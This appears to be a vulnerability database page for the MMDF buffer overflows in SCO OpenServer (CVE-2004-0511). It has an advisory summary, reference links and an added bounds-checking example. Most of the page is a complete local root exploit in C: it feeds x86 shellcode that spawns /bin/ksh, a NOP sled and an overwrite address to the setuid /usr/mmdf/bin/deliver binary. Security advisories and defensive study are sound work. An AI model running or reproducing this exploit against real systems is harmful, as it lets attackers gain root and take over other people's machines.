OpenServer MMDF Multiple Buffer Overflow Vulnerabilities

Vulnerability ID: 1108064  Vulnerability type: Boundary condition error
Published: 2004-07-20  Updated: 2005-10-20
CVE ID: CVE-2004-0511
CNNVD-ID: CNNVD-200412-090
Platform: SCO  CVSS score: 2.1
|Vulnerability source
https://www.exploit-db.com/exploits/24293
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-090
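|Vulnerability details
OpenServer is a commercial Unix-type operating system maintained by Caldera. execmail in the OpenServer MMDF package contains a buffer overflow that a local attacker can exploit to elevate privileges. MMDF also has NULL pointer dereference and core dump problems that can cause the application to crash.
|Exploit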
/*
source: http://www.securityfocus.com/bid/10758/info

It has been reported that the SCO Multi-channel Memorandum Distribution Facility (MMDF) is affected by multiple vulnerabilities. These issues are due to a failure of the utility to properly validate buffer boundaries when copying user-supplied input.

These issues are known to be exploitable locally, however due to the nature of the application it is likely that remote exploitation is possible as well, although this is not confirmed.

An attacker might leverage these issues to execute arbitrary code in the context of the vulnerable utility; many of the affected utilities are setuid binaries by default. These issues might also be leveraged to cause the affected utility to crash, denying service to legitimate users.
*/

/*
 *  MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
 *  Copyright 2004 Ramon de Carvalho Valle
 *
 */

char shellcode[]=             /*  36 bytes                          */
    "\x68\xff\xf8\xff\x3c"    /*  pushl   $0x3cfff8ff               */
    "\x6a\x65"                /*  pushl   $0x65                     */
    "\x89\xe6"                /*  movl    %esp,%esi                 */
    "\xf7\x56\x04"            /*  notl    0x04(%esi)                */
    "\xf6\x16"                /*  notb    (%esi)                    */
    "\x31\xc0"                /*  xorl    %eax,%eax                 */
    "\x50"                    /*  pushl   %eax                      */
    "\x68""/ksh"              /*  pushl   $0x68736b2f               */
    "\x68""/bin"              /*  pushl   $0x6e69622f               */
    "\x89\xe3"                /*  movl    %esp,%ebx                 */
    "\x50"                    /*  pushl   %eax                      */
    "\x50"                    /*  pushl   %eax                      */
    "\x53"                    /*  pushl   %ebx                      */
    "\xb0\x3b"                /*  movb    $0x3b,%al                 */
    "\xff\xd6"                /*  call    *%esi                     */
;

main(int argc,char **argv) {
    char buffer[16384],address[4],*p;
    int i;

    printf("MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86\n");
    printf("Copyright 2004 Ramon de Carvalho Valle\n\n");

    *((unsigned long *)address)=(unsigned long)buffer-256+5120+4097;

    sprintf(buffer,"-c");
    p=buffer+2;
    for(i=0;i<5120;i++) *p++=address[i%4];
    for(i=0;i<8192;i++) *p++=0x90;
    for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
    *p=0;

    execl("/usr/mmdf/bin/deliver","deliver",buffer,0);
}
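
For contrast with the proof of concept above, which hands `deliver` a single `-c` argument more than 13,000 bytes long, here is the bounds check whose absence the advisory describes. This is an added example, not MMDF source or code from the original page; the function name `parse_chan_opt`, the helper `check_oversized`, and the 64-byte limit `CHAN_MAX` are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define CHAN_MAX 64  /* assumed limit; MMDF's real buffer size is not on the page */

/* Hypothetical handler for a "-c<value>" argument in a setuid program.
 * Returns 0 on success, -1 if arg is missing or malformed,
 * -2 if the value does not fit in out. */
int parse_chan_opt(const char *arg, char *out, size_t outsz)
{
    size_t len;

    if (arg == NULL || out == NULL || outsz == 0)
        return -1;               /* never dereference a NULL argument */
    if (strncmp(arg, "-c", 2) != 0)
        return -1;
    arg += 2;
    len = strlen(arg);
    if (len == 0)
        return -1;
    /* The unchecked form is strcpy(out, arg): the caller of the
     * privileged program then decides how many bytes are written. */
    if (len >= outsz)
        return -2;               /* reject; do not truncate silently */
    memcpy(out, arg, len + 1);   /* length verified, copies the NUL too */
    return 0;
}

/* Constructed input with the same length as the PoC argument
 * ("-c" + 5120 + 8192 + 36 bytes), filled with harmless 'A' bytes. */
int check_oversized(void)
{
    static char big[2 + 5120 + 8192 + 36 + 1];
    char chan[CHAN_MAX];

    memset(big, 'A', sizeof big - 1);
    memcpy(big, "-c", 2);
    big[sizeof big - 1] = '\0';
    return parse_chan_opt(big, chan, sizeof chan);
}

int main(void)
{
    char chan[CHAN_MAX];

    printf("normal:    %d\n", parse_chan_opt("-clocal", chan, sizeof chan));
    printf("oversized: %d\n", check_oversized());
    return 0;
}
```
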
|References

Source: XF
Name: openserver-mmdf-name-dos(16739)
Link: http://xforce.iss.net/xforce/xfdb/16739
Source: BID
Name: 10758
Link: http://www.securityfocus.com/bid/10758
Source: SCO
Name: SCOSA-2004.7
Link: ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.7/SCOSA-2004.7.txt